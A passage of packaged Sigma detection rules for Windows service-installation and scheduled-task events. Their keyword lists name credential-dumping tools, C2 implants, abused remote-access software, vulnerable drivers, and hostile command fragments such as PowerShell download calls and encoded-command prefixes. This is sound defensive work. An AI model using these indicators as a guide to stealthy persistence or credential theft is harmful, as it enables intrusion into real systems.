    "content": "title: HackTool Service Registration or Execution\nid: d26ce60c-2151-403c-9a42-49420d87b5e4\nstatus: test\ndescription: Detects installation or execution of services\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-21\nmodified: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID:\n            - 7045\n            - 7036\n    selection_service_name:\n        ServiceName|contains:\n            - 'cachedump'\n            - 'DumpSvc'\n            - 'gsecdump'\n            - 'pwdump'\n            - 'UACBypassedService'\n            - 'WCE SERVICE'\n            - 'WCESERVICE'\n            - 'winexesvc'\n    selection_service_image:\n        ImagePath|contains: 'bypass' # https://gist.github.com/tyranid/c24cfd1bd141d14d4925043ee7e03c82#file-scmuacbypass-cpp-L159\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_mesh_agent.yml",
    "content": "title: Mesh Agent Service Installation\nid: e0d1ad53-c7eb-48ec-a87a-72393cc6cedc\nstatus: test\ndescription: Detects a Mesh Agent service installation. Mesh Agent is used to remotely manage computers\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'MeshAgent.exe'\n        - ServiceName|contains: 'Mesh Agent'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_netsupport_manager.yml",
    "content": "title: NetSupport Manager Service Install\nid: 2d510d8d-912b-45c5-b1df-36faa3d8c3f4\nstatus: test\ndescription: Detects NetSupport Manager service installation on the target system.\nreferences:\n    - http://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Example:\n    #   <EventData>\n    #       <Data Name=\"ServiceName\">Client32</Data>\n    #       <Data Name=\"ImagePath\">\"C:\\Program Files (x86)\\NetSupport\\NetSupport Manager\\client32.exe\" /* *</Data>\n    #       <Data Name=\"ServiceType\">user mode service</Data>\n    #       <Data Name=\"StartType\">auto start</Data>\n    #       <Data Name=\"AccountName\">LocalSystem</Data>\n    #   </EventData>\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: '\\NetSupport Manager\\client32.exe'\n        - ServiceName: 'Client32'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_paexec.yml",
    "content": "title: PAExec Service Installation\nid: de7ce410-b3fb-4e8a-b38c-3b999e2c3420\nstatus: test\ndescription: Detects PAExec service installation\nreferences:\n    - https://www.poweradmin.com/paexec/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-26\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_image:\n        - ServiceName|startswith: 'PAExec-'\n        - ImagePath|startswith: 'C:\\WINDOWS\\PAExec-'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml",
    "content": "title: New PDQDeploy Service - Server Side\nid: ee9ca27c-9bd7-4cee-9b01-6e906be7cae3\nstatus: test\ndescription: |\n    Detects a PDQDeploy service installation which indicates that PDQDeploy was installed on the machines.\n    PDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\nreferences:\n    - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'PDQDeployService.exe'\n        - ServiceName:\n              - 'PDQDeploy'\n              - 'PDQ Deploy'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy_runner.yml",
    "content": "title: New PDQDeploy Service - Client Side\nid: b98a10af-1e1e-44a7-bab2-4cc026917648\nstatus: test\ndescription: |\n    Detects PDQDeploy service installation on the target system.\n    When a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\nreferences:\n    - https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-22\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'PDQDeployRunner-'\n        - ServiceName|startswith: 'PDQDeployRunner-'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_pua_proceshacker.yml",
    "content": "title: ProcessHacker Privilege Elevation\nid: c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9\nstatus: test\ndescription: Detects a ProcessHacker tool that elevated privileges to a very high level\nreferences:\n    - https://twitter.com/1kwpeter/status/1397816101455765504\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-05-27\nmodified: 2022-12-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName|startswith: 'ProcessHacker'\n        AccountName: 'LocalSystem'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remcom.yml",
    "content": "title: RemCom Service Installation\nid: 9e36ed87-4986-482e-8e3b-5c23ffff11bf\nstatus: test\ndescription: Detects RemCom service installation and execution events\nreferences:\n    - https://github.com/kavika13/RemCom/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-08-07\ntags:\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'RemComSvc'\n        - ImagePath|endswith: '\\RemComSvc.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_access_software.yml",
    "content": "title: Remote Access Tool Services Have Been Installed - System\nid: 1a31b18a-f00c-4061-9900-f735b96c99fc\nrelated:\n    - id: c8b00925-926c-47e3-beea-298fd563728e\n      type: similar\nstatus: test\ndescription: Detects service installation of different remote access tools software. These software are often abused by threat actors to perform\nreferences:\n    - https://redcanary.com/blog/misbehaving-rats/\nauthor: Connor Martin, Nasreddine Bencherchali\ndate: 2022-12-23\nmodified: 2023-06-22\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID:\n            - 7045\n            - 7036\n        ServiceName|contains:\n            # Based on https://github.com/SigmaHQ/sigma/pull/2841\n            - 'AmmyyAdmin' # https://www.ammyy.com/en/\n            - 'Atera'\n            - 'BASupportExpressSrvcUpdater' # https://www.systemlookup.com/O23/6837-BASupSrvcUpdater_exe.html\n            - 'BASupportExpressStandaloneService' # https://www.systemlookup.com/O23/6839-BASupSrvc_exe.html\n            - 'chromoting'\n            - 'GoToAssist' # https://www.goto.com/it-management/resolve\n            - 'GoToMyPC' # https://get.gotomypc.com/\n            - 'jumpcloud'\n            - 'LMIGuardianSvc' # https://www.logmein.com/\n            - 'LogMeIn' # https://www.logmein.com/\n            - 'monblanking'\n            - 'Parsec'\n            - 'RManService' # https://www.systemlookup.com/O23/7855-rutserv_exe.html\n            - 'RPCPerformanceService' # https://www.remotepc.com/\n            - 'RPCService' # https://www.remotepc.com/\n            - 'SplashtopRemoteService' # https://www.splashtop.com/\n            - 'SSUService'\n            - 'TeamViewer'\n            - 'TightVNC' # https://www.tightvnc.com/\n            - 'vncserver'\n            - 'Zoho'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_remote_utilities.yml",
    "content": "title: Remote Utilities Host Service Install\nid: 85cce894-dd8b-4427-a958-5cc47a4dc9b9\nstatus: test\ndescription: Detects Remote Utilities Host service installation on the target system.\nreferences:\n    - https://www.remoteutilities.com/support/kb/host-service-won-t-start/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-10-31\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    # Example:\n    #   <EventData>\n    #       <Data Name=\"ServiceName\">Remote Utilities - Host</Data>\n    #       <Data Name=\"ImagePath\">\"C:\\Program Files (x86)\\Remote Utilities - Host\\rutserv.exe\" -service</Data>\n    #       <Data Name=\"ServiceType\">user mode service</Data>\n    #       <Data Name=\"StartType\">auto start</Data>\n    #       <Data Name=\"AccountName\">LocalSystem</Data>\n    #   </EventData>\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains|all:\n              - '\\rutserv.exe'\n              - '-service'\n        - ServiceName: 'Remote Utilities - Host'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml",
    "content": "title: Sliver C2 Default Service Installation\nid: 31c51af6-e7aa-4da7-84d4-8f32cc580af2\nstatus: test\ndescription: Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands\nreferences:\n    - https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231\n    - https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-25\ntags:\n    - attack.persistence\n    - attack.execution\n    - attack.privilege-escalation\n    - attack.t1543.003\n    - attack.t1569.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service_1:\n        ImagePath|re: '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe'\n    selection_service_2:\n        ServiceName:\n            - 'Sliver'\n            - 'Sliver implant'\n    condition: selection_eid and 1 of selection_service_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sups_unusal_client.yml",
    "content": "title: Service Installed By Unusual Client - System\nid: 71c276aa-49cd-43d2-b920-2dcd3e6962d5\nrelated:\n    - id: c4e92a97-a9ff-4392-9d2d-7a4c642768ca\n      type: similar\nstatus: test\ndescription: Detects a service installed by a client which has PID 0 or whose parent has PID 0\nreferences:\n    - https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html\nauthor: Tim Rauch (Nextron Systems), Elastic (idea)\ndate: 2022-09-15\nmodified: 2023-01-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1543\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ProcessId: 0\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_susp.yml",
    "content": "title: Suspicious Service Installation\nid: 1d61f71d-59d2-479e-9562-4ff5f4ead16b\nrelated:\n    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53\n      type: obsolete\n    - id: 26481afe-db26-4228-b264-25a29fe6efc7\n      type: similar\nstatus: test\ndescription: Detects suspicious service installation commands\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems), Florian Roth (Nextron Systems)\ndate: 2022-03-18\nmodified: 2023-12-04\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - ' -nop '\n            - ' -sta '\n            - ' -w hidden '\n            - ':\\Temp\\'\n            - '.downloadfile(' # PowerShell download command\n            - '.downloadstring(' # PowerShell download command\n            - '\\ADMIN$\\'\n            - '\\Perflogs\\'\n            - '&&'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml",
    "content": "title: PsExec Service Installation\nid: 42c575ea-e41e-41f1-b248-8093c3e82a28\nstatus: test\ndescription: Detects PsExec service installation and execution events\nreferences:\n    - https://www.jpcert.or.jp/english/pub/sr/ir_research.html\n    - https://jpcertcc.github.io/ToolAnalysisResultSheet\nauthor: Thomas Patzke\ndate: 2017-06-12\nmodified: 2023-08-04\ntags:\n    - attack.execution\n    - attack.t1569.002\n    - attack.s0029\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ServiceName: 'PSEXESVC'\n        - ImagePath|endswith: '\\PSEXESVC.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tacticalrmm.yml",
    "content": "title: TacticalRMM Service Installation\nid: 4bb79b62-ef12-4861-981d-2aab43fab642\nstatus: test\ndescription: Detects a TacticalRMM service installation. Tactical RMM is a remote monitoring & management tool.\nreferences:\n    - https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-28\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_root:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_service:\n        - ImagePath|contains: 'tacticalrmm.exe'\n        - ServiceName|contains: 'TacticalRMM Agent Service'\n    condition: all of selection_*\nfalsepositives:\n    - Legitimate use of the tool\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_tap_driver.yml",
    "content": "title: Tap Driver Installation\nid: 8e4cf0e5-aa5d-4dc3-beff-dc26917744a9\nstatus: test\ndescription: Well-known TAP software installation. Possible preparation for data exfiltration using tunnelling techniques\nreferences:\n    - https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers\nauthor: Daniil Yugoslavskiy, Ian Davis, oscd.community\ndate: 2019-10-24\nmodified: 2022-12-25\ntags:\n    - attack.exfiltration\n    - attack.t1048\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains: 'tap0901'\n    condition: selection\nfalsepositives:\n    - Legitimate OpenVPN TAP installation\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_install_uncommon.yml",
    "content": "title: Uncommon Service Installation Image Path\nid: 26481afe-db26-4228-b264-25a29fe6efc7\nrelated:\n    - id: ca83e9f3-657a-45d0-88d6-c1ac280caf53\n      type: obsolete\n    - id: 1d61f71d-59d2-479e-9562-4ff5f4ead16b\n      type: derived\nstatus: test\ndescription: |\n    Detects uncommon service installation commands by looking at suspicious or uncommon image path values containing references to encoded powershell commands, temporary paths, etc.\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-18\nmodified: 2024-02-09\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    suspicious_paths:\n        ImagePath|contains:\n            - '\\\\\\\\.\\\\pipe'\n            - '\\Users\\Public\\'\n            - '\\Windows\\Temp\\'\n    suspicious_encoded_flag:\n        ImagePath|contains: ' -e'\n    suspicious_encoded_keywords:\n        ImagePath|contains:\n            - ' aQBlAHgA' # PowerShell encoded commands\n            - ' aWV4I' # PowerShell encoded commands\n            - ' IAB' # PowerShell encoded commands\n            - ' JAB' # PowerShell encoded commands\n            - ' PAA' # PowerShell encoded commands\n            - ' SQBFAFgA' # PowerShell encoded commands\n            - ' SUVYI' # PowerShell encoded commands\n    filter_optional_thor_remote:\n        ImagePath|startswith: 'C:\\WINDOWS\\TEMP\\thor10-remote\\thor64.exe'\n    filter_main_defender_def_updates:\n        ImagePath|startswith: 'C:\\ProgramData\\Microsoft\\Windows Defender\\Definition Updates\\'\n    condition: selection and ( suspicious_paths or all of suspicious_encoded_* ) and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_generic.yml",
    "content": "title: Windows Service Terminated With Error\nid: acfa2210-0d71-4eeb-b477-afab494d596c\nrelated:\n    - id: d6b5520d-3934-48b4-928c-2aa3f92d6963\n      type: similar\nstatus: test\ndescription: Detects Windows services that got terminated for whatever reason\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7023 # The X Service service terminated with the following error\n    condition: selection\nfalsepositives:\n    - False positives could occur since service termination could happen due to multiple reasons\nlevel: low\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_error_important.yml",
    "content": "title: Important Windows Service Terminated With Error\nid: d6b5520d-3934-48b4-928c-2aa3f92d6963\nrelated:\n    - id: acfa2210-0d71-4eeb-b477-afab494d596c\n      type: similar\nstatus: test\ndescription: Detects important or interesting Windows services that got terminated for whatever reason\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7023 # The X Service service terminated with the following error\n    selection_name:\n        - param1|contains:\n              # Note that these names are \"Display Names\" and are language specific. If you're using a non-english system these can and will be different\n              - ' Antivirus'\n              - ' Firewall'\n              - 'Application Guard'\n              - 'BitLocker Drive Encryption Service'\n              - 'Encrypting File System'\n              - 'Microsoft Defender'\n              - 'Threat Protection'\n              - 'Windows Event Log'\n        # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name.\n        - Binary|contains:\n              - '770069006e0064006500660065006e006400' # windefend (Microsoft Defender Antivirus Service)\n              - '4500760065006e0074004c006f006700' # EventLog\n              - '6d0070007300730076006300' # mpssvc (Windows Defender Firewall)\n              - '530065006e0073006500' # Sense (Windows Defender Advanced Threat Protection Service)\n              - '450046005300' # EFS (Encrypting File System)\n              - '420044004500530056004300' # BDESVC (BitLocker Drive Encryption Service)\n    condition: all of selection_*\nfalsepositives:\n    - Rare false positives could occur since service termination could happen due to multiple reasons\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_service_terminated_unexpectedly.yml",
    "content": "title: Important Windows Service Terminated Unexpectedly\nid: 56abae0c-6212-4b97-adc0-0b559bb950c3\nstatus: test\ndescription: Detects important or interesting Windows services that got terminated unexpectedly.\nreferences:\n    - https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-04-14\ntags:\n    - attack.defense-evasion\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7034 # The X service terminated unexpectedly. It has done this Y time(s).\n    selection_name:\n        # Note that these names contained in \"param1\" are \"Display Names\" and are language specific. If you're using a non-english system these can and will be different\n        - param1|contains: 'Message Queuing'\n        # Use this If you collect the binary value provided from this event, which is the wide hex encoded value of the service name.\n        - Binary|contains:\n              - '4d0053004d005100' # MSMQ (Microsoft Message Queuing). Encoded in upper case just in case\n              - '6d0073006d007100' # msmq\n    condition: all of selection_*\nfalsepositives:\n    - Rare false positives could occur since service termination could happen due to multiple reasons\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_rtcore64_service_install.yml",
    "content": "title: RTCore Suspicious Service Installation\nid: 91c49341-e2ef-40c0-ac45-49ec5c3fe26c\nstatus: test\ndescription: Detects the installation of RTCore service. Which could be an indication of Micro-Star MSI Afterburner vulnerable driver abuse\nreferences:\n    - https://github.com/br-sn/CheekyBlinder/blob/e1764a8a0e7cda8a3716aefa35799f560686e01c/CheekyBlinder/CheekyBlinder.cpp\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-08-30\ntags:\n    - attack.persistence\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ServiceName: 'RTCore64'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder.yml",
    "content": "title: Service Installation in Suspicious Folder\nid: 5e993621-67d4-488a-b9ae-b420d08b96cb\nstatus: test\ndescription: Detects service installation in suspicious folder appdata\nauthor: pH-T (Nextron Systems)\nreferences:\n    - Internal Research\ndate: 2022-03-18\nmodified: 2024-01-18\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n        ImagePath|contains:\n            - '\\AppData\\'\n            - '\\\\\\\\127.0.0.1'\n            - '\\\\\\\\localhost'\n    filter_optional_zoom:\n        ServiceName: 'Zoom Sharing Service'\n        ImagePath|contains: ':\\Program Files\\Common Files\\Zoom\\Support\\CptService.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_folder_pattern.yml",
    "content": "title: Service Installation with Suspicious Folder Pattern\nid: 1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2\nstatus: test\ndescription: Detects service installation with suspicious folder patterns\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-18\nmodified: 2022-03-24\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_img_paths:\n        - ImagePath|re: '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe'\n        - ImagePath|re: '^[Cc]:\\\\.{1,9}\\.exe'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/system/service_control_manager/win_system_susp_service_installation_script.yml",
    "content": "title: Suspicious Service Installation Script\nid: 70f00d10-60b2-4f34-b9a0-dc3df3fe762a\nstatus: test\ndescription: Detects suspicious service installation scripts\nreferences:\n    - Internal Research\nauthor: pH-T (Nextron Systems)\ndate: 2022-03-18\nmodified: 2024-03-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - car.2013-09-005\n    - attack.t1543.003\nlogsource:\n    product: windows\n    service: system\ndetection:\n    selection_eid:\n        Provider_Name: 'Service Control Manager'\n        EventID: 7045\n    selection_cmd_flags:\n        ImagePath|contains|windash:\n            - ' -c '\n            - ' -r '\n            - ' -k '\n    selection_binaries:\n        ImagePath|contains:\n            - 'cscript'\n            - 'mshta'\n            - 'powershell'\n            - 'pwsh'\n            - 'regsvr32'\n            - 'rundll32'\n            - 'wscript'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_execution_from_susp_locations.yml",
    "content": "title: Scheduled Task Executed From A Suspicious Location\nid: 424273ea-7cf8-43a6-b712-375f925e481f\nstatus: test\ndescription: Detects the execution of Scheduled Tasks where the Program being run is located in a suspicious location or it's an unusale program to be run from a Scheduled Task\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-02-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 129 # Created Task Process\n        Path|contains:\n            - 'C:\\Windows\\Temp\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\Desktop\\'\n            - '\\Downloads\\'\n            - '\\Users\\Public\\'\n            - 'C:\\Temp\\'\n    # If you experience FP. Uncomment the filter below and add the specific TaskName with the Program to it\n    # filter:\n    #     TaskName: '\\Exact\\Task\\Name'\n    #     Path: 'Exact\\Path'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_lolbin_execution_via_task_scheduler.yml",
    "content": "title: Scheduled Task Executed Uncommon LOLBIN\nid: f0767f15-0fb3-44b9-851e-e8d9a6d0005d\nstatus: test\ndescription: Detects the execution of Scheduled Tasks where the program being run is located in a suspicious location or where it is an unusual program to be run from a Scheduled Task\nreferences:\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-12-05\nmodified: 2023-02-07\ntags:\n    - attack.privilege-escalation\n    - attack.execution\n    - attack.persistence\n    - attack.t1053.005\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 129 # Created Task Process\n        Path|endswith:\n            - '\\calc.exe'\n            - '\\cscript.exe'\n            - '\\mshta.exe'\n            - '\\mspaint.exe'\n            - '\\notepad.exe'\n            - '\\regsvr32.exe'\n            # - '\\rundll32.exe'\n            - '\\wscript.exe'\n    # filter_system:\n    #     Path|endswith: '\\rundll32.exe'\n    #     TaskName|startswith: '\\Microsoft\\Windows\\'\n    # condition: selection and not 1 of filter_*\n    condition: selection\nfalsepositives:\n    - False positives may occur with some of the selected binaries if you have tasks using them (which could be very common in your environment). Exclude all the specific trusted tasks before using this rule\nlevel: medium\n"
  },
  {
    "path": "rules/windows/builtin/taskscheduler/win_taskscheduler_susp_schtasks_delete.yml",
    "content": "title: Important Scheduled Task Deleted\nid: 9e3cb244-bdb8-4632-8c90-6079c8f4f16d\nrelated:\n    - id: dbc1f800-0fe0-4bc0-9c66-292c2abe3f78 # ProcCreation schtasks delete\n      type: similar\n    - id: 7595ba94-cf3b-4471-aa03-4f6baa9e5fad # Security-Audting Eventlog\n      type: similar\nstatus: test\ndescription: |\n    Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities\nreferences:\n    - https://www.socinvestigation.com/most-common-windows-event-ids-to-hunt-mind-map/\nauthor: frack113\ndate: 2023-01-13\nmodified: 2023-02-07\ntags:\n    - attack.impact\n    - attack.t1489\nlogsource:\n    product: windows\n    service: taskscheduler\n    definition: 'Requirements: The \"Microsoft-Windows-TaskScheduler/Operational\" is disabled by default and needs to be enabled in order for this detection to trigger'\ndetection:\n    selection:\n        EventID: 141\n        TaskName|contains:\n            - '\\Windows\\SystemRestore\\SR'\n            - '\\Windows\\Windows Defender\\'\n            - '\\Windows\\BitLocker'\n            - '\\Windows\\WindowsBackup\\'\n            - '\\Windows\\WindowsUpdate\\'\n            - '\\Windows\\UpdateOrchestrator\\'\n            - '\\Windows\\ExploitGuard'\n    filter:\n        UserName|contains:\n            - 'AUTHORI'\n            - 'AUTORI'\n    condition: selection and not filter\nfalsepositives:\n    - 